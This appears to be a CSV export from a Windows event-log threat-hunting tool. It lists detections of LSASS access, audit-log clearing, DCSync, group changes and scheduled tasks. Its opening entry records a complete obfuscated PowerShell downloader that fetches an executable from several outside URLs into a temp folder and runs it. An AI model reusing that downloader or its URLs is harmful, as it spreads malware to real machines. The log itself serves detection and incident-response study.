.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=21 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item" ParameterBinding(New-Item): name="ItemType"; value="DIrectOry" ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\" ",DESKTOP-RIPCLIP,Windows PowerShell non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663," 4663 1 0 12802 0 0x8020000000000000 314462 Security MSEDGEWIN10 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x33392 Security Process \Device\HarddiskVolume1\Windows\System32\lsass.exe 0x558 %%4484 0x10 0x1688 C:\Windows\System32\cscript.exe - ",MSEDGEWIN10,Security non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656," 4656 1 0 12802 0 0x8020000000000000 314461 Security MSEDGEWIN10 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x33392 Security Process \Device\HarddiskVolume1\Windows\System32\lsass.exe 0x558 00000000-0000-0000-0000-000000000000 %%1537 %%1538 %%1539 %%1540 %%1541 %%4480 %%4481 %%4482 %%4483 %%4484 %%4485 %%4486 %%4487 %%4488 %%4489 %%4490 %%4491 %%4492 %%4493 - 0x1f3fff - 0 0x1688 C:\Windows\System32\cscript.exe - ",MSEDGEWIN10,Security Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 4987 Security IEWIN7 S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser IEWIN7 0xffa8 ",IEWIN7,Security Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 768617 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x4c331 ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 202793 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x40c6511 DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 202792 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x40c6511 DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 769792 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x4c331 ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 202791 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x40c6511 DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 887106 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x3a17a ",01566s-win16-ir.threebeesco.com,Security Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," 4688 2 0 13312 0 0x8020000000000000 329919 Security MSEDGEWIN10 S-1-5-18 MSEDGEWIN10$ WORKGROUP 0x3e7 0x17b8 \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe %%1936 0x27c S-1-0-0 IEUser MSEDGEWIN10 0x16e3db3 C:\Windows\System32\lsass.exe S-1-16-12288 ",MSEDGEWIN10,Security schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198239223 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T12:51:45Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 2988521 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1105 jbrown 3B 0x1717b6 ",01566s-win16-ir.threebeesco.com,Security User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," 4720 0 0 13824 0 0x8020000000000000 769634 Security 01566s-win16-ir.threebeesco.com $ 3B S-1-5-21-308926384-506822093-3341789130-107104 S-1-5-18 01566S-WIN16-IR$ 3B 0x3e7 - $ %%1793 - %%1793 %%1793 %%1793 %%1793 %%1793 %%1794 %%1794 513 - 0x0 0x15 %%2080 %%2082 %%2084 %%1792 - %%1793 ",01566s-win16-ir.threebeesco.com,Security User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," 4720 0 0 13824 0 0x8020000000000000 769629 Security 01566s-win16-ir.threebeesco.com $ 3B S-1-5-21-308926384-506822093-3341789130-107103 S-1-5-18 01566S-WIN16-IR$ 3B 0x3e7 - $ %%1793 - %%1793 %%1793 %%1793 %%1793 %%1793 %%1794 %%1794 513 - 0x0 0x15 %%2080 %%2082 %%2084 %%1792 - %%1793 ",01566s-win16-ir.threebeesco.com,Security schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198238969 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T12:21:45Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198238774 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T11:51:45Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198238563 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T11:21:44Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," 1102 0 4 104 0 0x4020000000000000 772605 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-500 Administrator 3B 0x7b186 ",01566s-win16-ir.threebeesco.com,Security User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732," 4732 0 0 13826 0 0x8020000000000000 191030 Security MSEDGEWIN10 - S-1-5-20 Administrators Builtin S-1-5-32-544 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x27a10f - ",MSEDGEWIN10,Security User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732," 4732 0 0 13826 0 0x8020000000000000 191029 Security MSEDGEWIN10 - S-1-5-21-3461203602-4096304019-2269080069-501 Administrators Builtin S-1-5-32-544 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x27a10f - ",MSEDGEWIN10,Security Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 203056 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x418a6fb DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {9923a32a-3607-11d2-b9be-0000f87a36b2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," 1102 0 4 104 0 0x4020000000000000 203050 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 administrator insecurebank 0x218b896 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242594 Security DC1.insecurebank.local AF3067E0-BB6F-47C2-AA20-F3F458797F38 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242593 Security DC1.insecurebank.local 57DCCD4C-7381-4371-8480-D74D47019AD8 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 